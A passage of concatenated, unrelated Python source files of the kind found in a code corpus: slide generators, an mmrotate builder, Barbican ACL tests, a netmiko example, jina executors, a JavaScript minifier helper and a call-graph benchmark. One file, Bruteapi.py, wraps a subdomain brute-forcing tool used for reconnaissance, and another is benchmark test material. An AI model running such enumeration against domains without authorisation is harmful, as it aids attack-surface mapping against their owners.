@classmethod
def of(cls, title_generator, image_generator=None, original_image_size=True):
return cls(
CombinedSlideGenerator(
title_generator,
image_generator,
generator_util.StaticGenerator(original_image_size),
)
)
@property
def slide_type(self):
return slides.FullImageSlide
class TwoColumnImageSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(
cls,
title_generator,
caption_1_generator,
image_or_text_1_generator,
caption_2_generator,
image_or_text_2_generator,
original_image_size=True,
):
return cls(
CombinedSlideGenerator(
title_generator,
caption_1_generator,
image_or_text_1_generator,
caption_2_generator,
image_or_text_2_generator,
generator_util.StaticGenerator(original_image_size),
)
)
@classmethod
def of_tupled_captioned_images(
cls,
title_generator,
tuple_1_generator,
tuple_2_generator,
original_image_size=True,
):
return cls(
TwoTupledCaptionedImagesGenerator(
title_generator,
tuple_1_generator,
tuple_2_generator,
original_image_size,
)
)
@classmethod
def of_images_and_tupled_captions(
cls,
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
original_image_size=True,
):
return cls(
TwoImagesAndTupledCaptions(
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
original_image_size,
)
)
@property
def slide_type(self):
return slides.TwoColumnImageSlide
class TwoTupledCaptionedImagesGenerator(SlideGenerator):
def __init__(
self,
title_generator,
tuple_1_generator,
tuple_2_generator,
original_image_size=True,
):
super().__init__(self)
self._title_generator = title_generator
self._tuple_1_generator = tuple_1_generator
self._tuple_2_generator = tuple_2_generator
self._original_image_size = original_image_size
def __call__(self, presentation_context):
generated_tuple_1 = self._tuple_1_generator(presentation_context)
generated_tuple_2 = self._tuple_2_generator(presentation_context)
return (
self._title_generator(presentation_context),
generated_tuple_1[0],
generated_tuple_1[1],
(generated_tuple_2[0]),
generated_tuple_2[1],
self._original_image_size,
)
@property
def slide_type(self):
return slides.TwoColumnImageSlide
class TwoImagesAndTupledCaptions(SlideGenerator):
def __init__(
self,
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
original_image_size=True,
):
super().__init__(self)
logger.debug('initializing TwoImagesAndTupledCaptions')
self._title_generator = title_generator
self._captions_generator = captions_generator
self._image_1_generator = image_1_generator
self._image_2_generator = image_2_generator
self._original_image_size = original_image_size
def __call__(self, presentation_context):
logger.debug('Calling TwoImagesAndTupledCaptions')
logger.debug('**********************************')
logger.debug('presentation_context: {}'.format(presentation_context))
logger.debug('captions_generator: {}'.format(self._captions_generator))
logger.debug('original_image_size: {}'.format(self._original_image_size))
generated_tuple = self._captions_generator(presentation_context)
logger.debug('generated_tuple: {}'.format(generated_tuple))
logger.debug('title_generator: {}'.format(self._title_generator))
_title = self._title_generator(presentation_context)
logger.debug('_title: {}'.format(_title))
logger.debug('image_1_generator: {}'.format(self._image_1_generator))
_image1 = self._image_1_generator(presentation_context)
logger.debug('_image1: {}'.format(_image1))
logger.debug('image_2_generator: {}'.format(self._image_2_generator))
_image2 = self._image_2_generator(presentation_context)
logger.debug('_image2: {}'.format(_image2))
return (
_title,
generated_tuple[0],
_image1,
generated_tuple[1],
_image2,
self._original_image_size,
)
@property
def slide_type(self):
return slides.TwoColumnImageSlide
class ThreeColumnImageSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(
cls,
title_generator,
caption_1_generator,
image_or_text_1_generator,
caption_2_generator,
image_or_text_2_generator,
caption_3_generator,
image_or_text_3_generator,
original_image_size=True,
):
return cls(
CombinedSlideGenerator(
title_generator,
caption_1_generator,
image_or_text_1_generator,
caption_2_generator,
image_or_text_2_generator,
caption_3_generator,
image_or_text_3_generator,
generator_util.StaticGenerator(original_image_size),
)
)
@classmethod
def of_tupled_captioned_images(
cls,
title_generator,
tuple_1_generator,
tuple_2_generator,
tuple_3_generator,
original_image_size=True,
):
return cls(
ThreeTupledCaptionedImagesGenerator(
title_generator,
tuple_1_generator,
tuple_2_generator,
tuple_3_generator,
original_image_size,
)
)
@classmethod
def of_images_and_tupled_captions(
cls,
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
image_3_generator,
original_image_size=True,
):
return cls(
ThreeImagesAndTupledCaptions(
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
image_3_generator,
original_image_size,
)
)
@property
def slide_type(self):
return slides.ThreeColumnImageSlide
class ThreeTupledCaptionedImagesGenerator(SlideGenerator):
def __init__(
self,
title_generator,
tuple_1_generator,
tuple_2_generator,
tuple_3_generator,
original_image_size=True,
):
super().__init__(self)
self._title_generator = title_generator
self._tuple_1_generator = tuple_1_generator
self._tuple_2_generator = tuple_2_generator
self._tuple_3_generator = tuple_3_generator
self._original_image_size = original_image_size
def __call__(self, presentation_context):
generated_tuple_1 = self._tuple_1_generator(presentation_context)
generated_tuple_2 = self._tuple_2_generator(presentation_context)
generated_tuple_3 = self._tuple_3_generator(presentation_context)
return (
self._title_generator(presentation_context),
generated_tuple_1[0],
generated_tuple_1[1],
(generated_tuple_2[0]),
generated_tuple_2[1],
generated_tuple_3[0],
generated_tuple_3[1],
self._original_image_size,
)
@property
def slide_type(self):
return slides.ThreeColumnImageSlide
class ThreeImagesAndTupledCaptions(SlideGenerator):
def __init__(
self,
title_generator,
captions_generator,
image_1_generator,
image_2_generator,
image_3_generator,
original_image_size=True,
):
super().__init__(self)
self._title_generator = title_generator
self._captions_generator = captions_generator
self._image_1_generator = image_1_generator
self._image_2_generator = image_2_generator
self._image_3_generator = image_3_generator
self._original_image_size = original_image_size
def __call__(self, presentation_context):
generated_tuple = self._captions_generator(presentation_context)
return (
self._title_generator(presentation_context),
generated_tuple[0],
self._image_1_generator(presentation_context),
generated_tuple[1],
self._image_2_generator(presentation_context),
generated_tuple[2],
self._image_3_generator(presentation_context),
self._original_image_size,
)
@property
def slide_type(self):
return slides.ThreeColumnImageSlide
class ChartSlideGenerator(SlideGenerator):
def __init__(self, slide_content_generator):
super().__init__(slide_content_generator)
@classmethod
def of(
cls,
title_generator,
chart_type_generator,
chart_data_generator,
chart_modifier=None,
):
return cls(
CombinedSlideGenerator(
title_generator,
chart_type_generator,
chart_data_generator,
generator_util.StaticGenerator(chart_modifier),
)
)
@property
def slide_type(self):
return slides.ChartSlide
# HELPERS
class CombinedSlideGenerator(object):
def __init__(self, *generators):
# print("CombinedGenerator:", self, generators)
self._generators = generators
def __call__(self, presentation_context):
# print("CombinedGenerator:", self)
return [
content_generator(presentation_context) if content_generator else None
for content_generator in self._generators
]
def is_different_enough(generated, used):
(used_elements, allowed_repeated_elements) = used
return is_different_enough_for_allowed_repeated(
generated, used_elements, allowed_repeated_elements
)
def is_different_enough_for_allowed_repeated(
generated, used_elements, allowed_repeated_elements
):
if generated:
if not used_elements:
return True
intersection = set(generated) & used_elements
return allowed_repeated_elements >= len(intersection)
return False
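# A minimal usage sketch of the deduplication helpers above; the inputs are
# illustrative.
if __name__ == "__main__":
    generated = ("cat picture", "a caption")
    used = ({"cat picture", "old caption"}, 1)  # (used_elements, allowed_repeated_elements)
    print(is_different_enough(generated, used))  # True: one repeat, one allowed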
|
mmrotate/core/anchor/builder.py | williamcorsel/mmrotate | 449 | 11179074 |
# Copyright (c) OpenMMLab. All rights reserved.
from mmcv.utils import build_from_cfg
from mmdet.core.anchor.builder import ANCHOR_GENERATORS
ROTATED_ANCHOR_GENERATORS = ANCHOR_GENERATORS
def build_prior_generator(cfg, default_args=None):
return build_from_cfg(cfg, ROTATED_ANCHOR_GENERATORS, default_args)
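# A minimal sketch of a prior-generator config in the mmcv registry style;
# the generator type and field values below are assumptions and must match a
# class registered in ROTATED_ANCHOR_GENERATORS.
if __name__ == '__main__':
    cfg = dict(
        type='AnchorGenerator',
        scales=[8],
        ratios=[0.5, 1.0, 2.0],
        strides=[8, 16, 32, 64, 128],
    )
    prior_generator = build_prior_generator(cfg)
    print(prior_generator)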
|
Bruteapi.py | Yang2635/telescope | 699 | 11179077 | #encoding=utf8
from brutedns import Brutedomain
class cmd_args:
def __init__(self):
self.domain=''
self.speed=''
self.level=''
self.cdn = ''
self.sub_dict=''
self.next_sub_dict =''
self.default_dns = ''
self.other_result=''
class Brute_subdomain_api:
def run(self,domain, speed, level,default_dns,cdn,sub_dict,next_sub_dict,other_file):
cmd_args.domain = domain
cmd_args.speed = speed
cmd_args.level = level
cmd_args.sub_file = sub_dict
cmd_args.default_dns= default_dns
cmd_args.next_sub_file = next_sub_dict
cmd_args.other_file = other_file
cmd_args.cname='y'
brute = Brutedomain(cmd_args)
brute.run()
return brute.found_count
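# A hedged usage sketch; the argument values are illustrative, and what
# brutedns.Brutedomain accepts depends on that module.
if __name__ == '__main__':
    api = Brute_subdomain_api()
    found = api.run(domain='example.com', speed='high', level=2,
                    default_dns='y', cdn='y',
                    sub_dict='dict/sub.txt', next_sub_dict='dict/next_sub.txt',
                    other_file='n')
    print('found {0} subdomains'.format(found))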
|
data/micro-benchmark/lists/simple/main.py | vitsalis/pycg-evaluation | 121 | 11179106 | def func1():
pass
def func2():
pass
def func3():
pass
a = [func1, func2, func3]
a[0]()
a[1]()
a[2]()
def func4():
pass
b = [None]
b[0] = func4
b[0]()
|
barbican/tests/model/repositories/test_repositories_acls.py | mail2nsrajesh/barbican | 177 | 11179122 |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from barbican.common import exception
from barbican.model import models
from barbican.model import repositories
from barbican.tests import database_utils
class TestACLMixin(object):
def _assert_acl_users(self, user_ids, acls, acl_id, check_size=True):
"""Checks that all input users are present in matching acl users data.
        It also checks that the number of acl users matches the number of
        input users when the check_size flag is True.
"""
acls_map = self._map_id_to_acl(acls)
acl_users = acls_map[acl_id].to_dict_fields()['users']
if check_size:
self.assertEqual(len(user_ids), len(acl_users))
self.assertTrue(all(user_id in user_ids for user_id in acl_users))
def _map_id_to_acl(self, acls):
"""Provides dictionary of id and acl from acls list."""
m = {}
for acl in acls:
m[acl.id] = acl
return m
class WhenTestingSecretACLRepository(database_utils.RepositoryTestCase,
TestACLMixin):
def setUp(self):
super(WhenTestingSecretACLRepository, self).setUp()
self.acl_repo = repositories.get_secret_acl_repository()
def _create_base_secret(self, project_id=None):
# Setup the secret and needed base relationship
secret_repo = repositories.get_secret_repository()
session = secret_repo.get_session()
        if project_id is None:  # don't re-create the project if it was created earlier
project = models.Project()
project.external_id = "keystone_project_id"
project.save(session=session)
project_id = project.id
secret_model = models.Secret()
secret_model.project_id = project_id
secret = secret_repo.create_from(secret_model, session=session)
secret.save(session=session)
session.commit()
return secret
def test_get_by_secret_id(self):
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acls = self.acl_repo.get_by_secret_id(secret.id, session)
self.assertEqual(0, len(acls))
acl1 = self.acl_repo.create_from(models.SecretACL(secret.id, 'read',
True, ['u1', 'u2']),
session)
acls = self.acl_repo.get_by_secret_id(secret.id, session)
self.assertEqual(1, len(acls))
self.assertEqual(acl1.id, acls[0].id)
self.assertEqual('read', acls[0].operation)
self._assert_acl_users(['u2', 'u1'], acls, acl1.id)
def test_get_by_entity_id(self):
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'read', True, ['u1', 'u2']), session)
acl = self.acl_repo.get(acl1.id, session)
self.assertIsNotNone(acl)
self.assertEqual(acl1.id, acl.id)
self.assertEqual('read', acl.operation)
self._assert_acl_users(['u1', 'u2'], [acl], acl1.id)
self.acl_repo.delete_entity_by_id(acl1.id, session)
acl = self.acl_repo.get(acl1.id, session, suppress_exception=True)
self.assertIsNone(acl)
def test_should_raise_notfound_exception_get_by_entity_id(self):
self.assertRaises(exception.NotFound, self.acl_repo.get,
"invalid_id", suppress_exception=False)
def test_create_or_replace_from_for_new_acls(self):
"""Check create_or_replace_from and get count call.
        It creates new acls with users and makes sure that the same users
        are returned when the acls are queried by secret id.
        It uses get_count to assert the expected number of acls for that secret.
"""
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'read'), session)
self.acl_repo.create_or_replace_from(
secret, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'write', False), session)
self.acl_repo.create_or_replace_from(
secret, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
acl3 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'delete'), session)
self.acl_repo.create_or_replace_from(
secret, acl3, user_ids=[], session=session)
acls = self.acl_repo.get_by_secret_id(secret.id, session)
self.assertEqual(3, len(acls))
id_map = self._map_id_to_acl(acls)
self.assertTrue(id_map[acl1.id].project_access)
self.assertFalse(id_map[acl2.id].project_access)
self.assertEqual('read', id_map[acl1.id].operation)
self.assertEqual('write', id_map[acl2.id].operation)
self.assertEqual('delete', id_map[acl3.id].operation)
# order of input users should not matter
self._assert_acl_users(['u1', 'u2'], acls, acl1.id)
self._assert_acl_users(['u2', 'u1'], acls, acl1.id)
self._assert_acl_users(['u2', 'u1', 'u3'], acls, acl2.id)
count = self.acl_repo.get_count(secret.id, session)
self.assertEqual(3, count)
self.assertEqual(count, len(acls))
def test_create_or_replace_from_with_none_or_blank_users(self):
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'read'), session)
self.acl_repo.create_or_replace_from(
secret, acl1, user_ids=None, session=session)
acl2 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'list'), session)
self.acl_repo.create_or_replace_from(
            secret, acl2, user_ids=[], session=session)
acls = self.acl_repo.get_by_secret_id(secret.id, session)
id_map = self._map_id_to_acl(acls)
self.assertIsNone(id_map[acl1.id].to_dict_fields().get('users'))
self.assertIsNone(id_map[acl2.id].to_dict_fields().get('users'))
def test_create_or_replace_from_for_existing_acls(self):
"""Check create_or_replace_from and get count call.
        It modifies existing acls with users and makes sure that the updated
        users and project_access flag changes are returned when the acls are
        queried by secret id. It uses get_count to assert the expected number
        of acls for that secret.
"""
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'read'), session)
self.acl_repo.create_or_replace_from(
secret, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'write'), session)
self.acl_repo.create_or_replace_from(
secret, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
acl3 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'list'), session)
self.acl_repo.create_or_replace_from(
secret, acl3, user_ids=[], session=session)
acls = self.acl_repo.get_by_secret_id(secret.id, session)
self.assertEqual(3, len(acls))
id_map = self._map_id_to_acl(acls)
# replace users in existing acls
id_map[acl1.id].project_access = False
self.acl_repo.create_or_replace_from(
secret, id_map[acl1.id], user_ids=['u5'], session=session)
self.acl_repo.create_or_replace_from(
secret, id_map[acl2.id], user_ids=['u1', 'u2', 'u3', 'u4'],
session=session)
self.acl_repo.create_or_replace_from(
secret, id_map[acl3.id], user_ids=['u1', 'u2', 'u4'],
session=session)
session.commit() # commit the changes made so far
acls = self.acl_repo.get_by_secret_id(secret.id, session)
id_map = self._map_id_to_acl(acls)
self.assertEqual(3, len(acls))
self.assertFalse(id_map[acl1.id].project_access)
self.assertTrue(id_map[acl2.id].project_access)
self.assertTrue(id_map[acl3.id].project_access)
self._assert_acl_users(['u5'], acls, acl1.id)
self._assert_acl_users(['u1', 'u2', 'u3', 'u4'], acls, acl2.id)
self._assert_acl_users(['u1', 'u2', 'u4'], acls, acl3.id)
def test_get_count(self):
session = self.acl_repo.get_session()
secret1 = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(secret1.id, 'read',
None, ['u1', 'u2']),
session)
self.acl_repo.create_or_replace_from(secret1, acl1)
secret2 = self._create_base_secret(secret1.project.id)
acl21 = self.acl_repo.create_from(models.SecretACL(secret2.id, 'read',
None, ['u3', 'u4']),
session)
self.acl_repo.create_or_replace_from(secret2, acl21)
acl22 = self.acl_repo.create_from(models.SecretACL(secret2.id, 'write',
None, ['u5', 'u6']),
session)
self.acl_repo.create_or_replace_from(secret2, acl22)
self.assertEqual(1, self.acl_repo.get_count(secret1.id))
self.assertEqual(2, self.acl_repo.get_count(secret2.id))
def test_delete_single_acl_and_count(self):
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(secret.id, 'read',
None, ['u1', 'u2']),
session)
self.acl_repo.create_or_replace_from(secret, acl1)
acl2 = self.acl_repo.create_from(
models.SecretACL(secret.id, 'write'), session)
self.acl_repo.create_or_replace_from(
secret, acl2, user_ids=['u1', 'u2', 'u3'])
acl3 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'list'), session)
self.acl_repo.create_or_replace_from(secret, acl3,
user_ids=['u1', 'u3'])
count = self.acl_repo.get_count(secret.id)
self.assertEqual(3, count)
self.acl_repo.delete_entity_by_id(acl2.id, None)
session.commit()
self.assertEqual(2, len(secret.secret_acls))
deleted_acl = self.acl_repo.get(acl2.id, suppress_exception=True)
self.assertIsNone(deleted_acl)
acls = self.acl_repo.get_by_secret_id(secret.id)
self.assertEqual(2, len(acls))
count = self.acl_repo.get_count(secret.id)
self.assertEqual(2, count)
def test_delete_acls_for_secret(self):
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'read'), session)
self.acl_repo.create_or_replace_from(
secret, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'write'), session)
self.acl_repo.create_or_replace_from(
secret, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
self.acl_repo.delete_acls_for_secret(secret)
acls = self.acl_repo.get_by_secret_id(secret.id)
self.assertEqual(0, len(acls))
class WhenTestingContainerACLRepository(database_utils.RepositoryTestCase,
TestACLMixin):
def setUp(self):
super(WhenTestingContainerACLRepository, self).setUp()
self.acl_repo = repositories.get_container_acl_repository()
def _create_base_container(self, project_id=None):
# Setup the container and needed base relationship
container_repo = repositories.get_container_repository()
session = container_repo.get_session()
if project_id is None:
project = models.Project()
project.external_id = "keystone_project_id"
project.save(session=session)
project_id = project.id
container = models.Container()
container.project_id = project_id
container.save(session=session)
session.commit()
return container
def test_get_by_container_id(self):
session = self.acl_repo.get_session()
container = self._create_base_container()
acls = self.acl_repo.get_by_container_id(container.id, session)
self.assertEqual(0, len(acls))
acl1 = self.acl_repo.create_from(models.ContainerACL(container.id,
'read', True,
['u1', 'u2']),
session)
acls = self.acl_repo.get_by_container_id(container.id, session)
self.assertEqual(1, len(acls))
self.assertEqual(acl1.id, acls[0].id)
self.assertEqual('read', acls[0].operation)
self._assert_acl_users(['u1', 'u2'], acls, acl1.id)
def test_get_by_entity_id(self):
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read', True, ['u1', 'u2']), session)
acl = self.acl_repo.get(acl1.id, session)
self.assertIsNotNone(acl)
self.assertEqual(acl1.id, acl.id)
self.assertEqual('read', acl.operation)
self._assert_acl_users(['u1', 'u2'], [acl], acl1.id)
self.acl_repo.delete_entity_by_id(acl1.id, session)
acl = self.acl_repo.get(acl1.id, session, suppress_exception=True)
self.assertIsNone(acl)
def test_should_raise_notfound_exception_get_by_entity_id(self):
self.assertRaises(exception.NotFound, self.acl_repo.get,
"invalid_id", suppress_exception=False)
def test_create_or_replace_from_for_new_acls(self):
"""Check create_or_replace_from and get count call.
        It creates new acls with users and makes sure that the same users
        are returned when the acls are queried by container id.
        It uses get_count to assert the expected number of acls for that container.
"""
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read'), session)
self.acl_repo.create_or_replace_from(
container, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'write', False), session)
self.acl_repo.create_or_replace_from(
container, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
acl3 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'list'), session)
self.acl_repo.create_or_replace_from(
container, acl3, user_ids=[], session=session)
acls = self.acl_repo.get_by_container_id(container.id, session)
self.assertEqual(3, len(acls))
id_map = self._map_id_to_acl(acls)
self.assertTrue(id_map[acl1.id].project_access)
self.assertFalse(id_map[acl2.id].project_access)
self.assertEqual('read', id_map[acl1.id].operation)
self.assertEqual('write', id_map[acl2.id].operation)
self.assertEqual('list', id_map[acl3.id].operation)
# order of input users should not matter
self._assert_acl_users(['u1', 'u2'], acls, acl1.id)
self._assert_acl_users(['u2', 'u1'], acls, acl1.id)
self._assert_acl_users(['u2', 'u1', 'u3'], acls, acl2.id)
count = self.acl_repo.get_count(container.id, session)
self.assertEqual(3, count)
self.assertEqual(count, len(acls))
def test_create_or_replace_from_with_none_or_blank_users(self):
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read'), session)
self.acl_repo.create_or_replace_from(
container, acl1, user_ids=None, session=session)
acl2 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'write'), session)
self.acl_repo.create_or_replace_from(
            container, acl2, user_ids=[], session=session)
acls = self.acl_repo.get_by_container_id(container.id, session)
id_map = self._map_id_to_acl(acls)
self.assertIsNone(id_map[acl1.id].to_dict_fields().get('users'))
self.assertIsNone(id_map[acl2.id].to_dict_fields().get('users'))
def test_create_or_replace_from_for_existing_acls(self):
"""Check create_or_replace_from and get count call.
        It modifies existing acls with users and makes sure that the updated
        users and project_access flag changes are returned when the acls are
        queried by container id. It uses get_count to assert the expected
        number of acls for that container.
"""
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read'), session)
self.acl_repo.create_or_replace_from(
container, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'write'), session)
self.acl_repo.create_or_replace_from(
container, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
acl3 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'list'), session)
self.acl_repo.create_or_replace_from(
container, acl3, user_ids=[], session=session)
acls = self.acl_repo.get_by_container_id(container.id, session)
self.assertEqual(3, len(acls))
id_map = self._map_id_to_acl(acls)
# replace users in existing acls
id_map[acl1.id].project_access = False
self.acl_repo.create_or_replace_from(
container, id_map[acl1.id], user_ids=['u5'], session=session)
self.acl_repo.create_or_replace_from(
container, id_map[acl2.id], user_ids=['u1', 'u2', 'u3', 'u4'],
session=session)
self.acl_repo.create_or_replace_from(
container, id_map[acl3.id], user_ids=['u1', 'u2', 'u4'],
session=session)
session.commit()
acls = self.acl_repo.get_by_container_id(container.id, session)
id_map = self._map_id_to_acl(acls)
self.assertEqual(3, len(acls))
self.assertFalse(id_map[acl1.id].project_access)
self.assertTrue(id_map[acl2.id].project_access)
self.assertTrue(id_map[acl3.id].project_access)
self._assert_acl_users(['u5'], acls, acl1.id)
self._assert_acl_users(['u1', 'u2', 'u3', 'u4'], acls, acl2.id)
self._assert_acl_users(['u1', 'u2', 'u4'], acls, acl3.id)
def test_get_count(self):
session = self.acl_repo.get_session()
container1 = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container1.id, 'read', None, ['u1', 'u2']), session)
self.acl_repo.create_or_replace_from(container1, acl1)
container2 = self._create_base_container(container1.project_id)
acl21 = self.acl_repo.create_from(models.ContainerACL(
container2.id, 'read', None, ['u3', 'u4']), session)
self.acl_repo.create_or_replace_from(container2, acl21)
acl22 = self.acl_repo.create_from(models.ContainerACL(
container2.id, 'write', None, ['u5', 'u6']), session)
self.acl_repo.create_or_replace_from(container2, acl22)
self.assertEqual(1, self.acl_repo.get_count(container1.id))
self.assertEqual(2, self.acl_repo.get_count(container2.id))
def test_delete_single_acl_and_count(self):
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read'), session)
self.acl_repo.create_or_replace_from(container, acl1,
user_ids=['u1', 'u2'])
acl2 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'write'), session)
self.acl_repo.create_or_replace_from(container, acl2,
user_ids=['u1', 'u2', 'u3'])
acl3 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'list'), session)
self.acl_repo.create_or_replace_from(container, acl3,
user_ids=['u1', 'u3'])
count = self.acl_repo.get_count(container.id)
self.assertEqual(3, count)
self.acl_repo.delete_entity_by_id(acl2.id, None)
session.commit() # commit the changes made so far
self.assertEqual(2, len(container.container_acls))
deleted_acl = self.acl_repo.get(acl2.id, suppress_exception=True)
self.assertIsNone(deleted_acl)
acls = self.acl_repo.get_by_container_id(container.id)
self.assertEqual(2, len(acls))
count = self.acl_repo.get_count(container.id)
self.assertEqual(2, count)
    def test_delete_acls_for_container(self):
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read'), session)
self.acl_repo.create_or_replace_from(
container, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'write'), session)
self.acl_repo.create_or_replace_from(
container, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
self.acl_repo.delete_acls_for_container(container)
acls = self.acl_repo.get_by_container_id(container.id)
self.assertEqual(0, len(acls))
|
examples/config_change.py | josephwhite13/netmiko | 2,833 | 11179134 | #!/usr/bin/env python
from netmiko import ConnectHandler
from getpass import getpass
device = {
"device_type": "cisco_ios",
"host": "cisco1.lasthop.io",
"username": "pyclass",
"password": getpass(),
}
commands = ["logging buffered 100000"]
with ConnectHandler(**device) as net_connect:
output = net_connect.send_config_set(commands)
output += net_connect.save_config()
print()
print(output)
print()
|
cross-modal-search/flows/executors.py | nikosNalmpantis/examples | 434 | 11179136 | """ Implementation of filters for images and texts"""
import numpy as np
from jina import Executor, DocumentArray, requests
class ImageReader(Executor):
@requests(on='/index')
def index_read(self, docs: 'DocumentArray', **kwargs):
array = DocumentArray(list(filter(lambda doc: doc.modality=='image', docs)))
for doc in array:
doc.convert_image_buffer_to_blob()
doc.blob = np.array(doc.blob).astype(np.uint8)
return array
@requests(on='/search')
def search_read(self, docs: 'DocumentArray', **kwargs):
image_docs = DocumentArray(list(filter(lambda doc: doc.mime_type in ('image/jpeg', 'image/png'), docs)))
if not image_docs:
return DocumentArray([])
for doc in image_docs:
doc.convert_uri_to_buffer()
doc.convert_image_buffer_to_blob()
doc.blob = doc.blob.astype(np.uint8)
return image_docs
class TextFilter(Executor):
@requests
def filter_text(self, docs: 'DocumentArray', **kwargs):
docs = DocumentArray(list(filter(lambda doc: doc.mime_type == 'text/plain', docs)))
return docs
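# A hedged sketch of wiring these executors into a Flow (jina 2.x style,
# assumed here; the names are illustrative):
#
#   from jina import Flow
#   f = Flow().add(uses=ImageReader).add(uses=TextFilter)
#   with f:
#       f.post(on='/index', inputs=index_docs)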
|
tests/test_tags_in_curlies_2.py | adamserafini/pyxl4 | 366 | 11179140 | # coding: pyxl
from pyxl import html
def test():
assert str(<frag>{'<img src="foo" />'}</frag>) == """<img src="foo" />"""
|
lib/python/lightningjs/compiler/__init__.py | hooplab/lightningjs | 193 | 11179154 | import os
import re
import sys
import tempfile
import subprocess
_CLOSURE_COMPRESSOR_PATH = os.path.join(os.path.dirname(__file__), 'closure-compiler.jar')
_YUI_COMPRESSOR_PATH = os.path.join(os.path.dirname(__file__), 'yuicompressor-2.4.2.jar')
def minify_with_closure(path):
pipe = subprocess.Popen([
'java',
'-jar',
_CLOSURE_COMPRESSOR_PATH,
# '--compilation_level',
# 'ADVANCED_OPTIMIZATIONS',
'--js',
path,
], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
response = pipe.communicate()
def only_warning_is_about_the_with_statement(output):
lines = output.split('\n')
num_warning_lines = len([True for line in lines if 'WARNING' in line])
num_with_warning_lines = len([True for line in lines if 'The use of the with structure should be avoided.' in line])
if num_with_warning_lines == num_warning_lines:
# all warnings were for the 'with' construct, ignore them
return True
else:
return False
if response[1] and not only_warning_is_about_the_with_statement(output=response[1]):
# TODO: render the closure errors more nicely?
error_list = [response[1]]
details = '\n'.join(error_list)
raise StandardError("failed to compile module '%(path)s':\n\n%(details)s\n\n" % locals())
return response[0]
def minify_with_yuicompressor(path, retain_variable_names=False):
# helper for displaying line-by-line YUI compressor errors
def _contextualize_yuicompressor_errors(path, yui_stderr_string):
# parse the YUI compressor errors line-by-line
reasons = [' '.join(x.split()[1:]) for x in yui_stderr_string.split('\n') if '[ERROR]' in x]
errors = []
with open(path) as source_fd:
lines = source_fd.readlines()
for reason in reasons:
line_number = int(reason.split(':')[0]) - 1
line_contents = lines[line_number].strip()
errors += ['%(reason)s =====> %(line_contents)s' % locals()]
return errors
command_pieces = [
'java',
'-jar',
_YUI_COMPRESSOR_PATH
]
if retain_variable_names:
command_pieces += ['--nomunge']
command_pieces += [
'--type',
'js',
path,
]
pipe = subprocess.Popen(command_pieces, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
response = pipe.communicate()
if response[1]:
        error_list = _contextualize_yuicompressor_errors(path=path, yui_stderr_string=response[1])
details = '\n'.join(error_list)
raise StandardError("failed to compile module '%(path)s':\n\n%(details)s\n\n" % locals())
return response[0]
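# A hedged usage sketch; 'bundle.js' is an illustrative path, and both
# helpers require a Java runtime for the bundled compressor jars.
if __name__ == '__main__':
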